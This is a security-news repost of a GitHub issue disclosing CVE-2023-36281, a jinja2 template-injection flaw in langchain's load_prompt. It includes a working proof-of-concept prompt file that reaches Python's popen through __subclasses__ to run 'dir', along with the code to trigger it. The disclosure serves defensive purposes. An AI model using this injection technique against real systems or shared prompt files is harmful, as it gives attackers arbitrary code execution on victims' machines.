Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-36281: Template injection to arbitrary code execution · Issue #4394 · langchain-ai/langchain

An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via the via the a json file to the load_prompt parameter.

CVE
#windows#js

System Info

windows 11

Who can help?

No response

Information

  • The official example notebooks/scripts
  • My own modified scripts

Related Components

  • LLMs/Chat Models
  • Embedding Models
  • Prompts / Prompt Templates / Prompt Selectors
  • Output Parsers
  • Document Loaders
  • Vector Stores / Retrievers
  • Memory
  • Agents / Agent Executors
  • Tools / Toolkits
  • Chains
  • Callbacks/Tracing
  • Async

Reproduction

  1. save the following data to pt.json

{ "input_variables": [ “prompt” ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ '’.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__[‘popen’](‘dir’).read() }}", "template_format": "jinja2", "validate_template": true, "_type": “prompt” }

  1. run

from langchain.prompts import load_prompt loaded_prompt = load_prompt(“pt.json”) loaded_prompt.format(history="", prompt="What is 1 + 1?")

  1. the dir command will be execute

attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the template has payload, the index of subclasses maybe different in other environment.

Expected behavior

code should not be execute

Related news

GHSA-7gfq-f96f-g85j: langchain vulnerable to arbitrary code execution

An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via the via the a json file to the load_prompt parameter.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907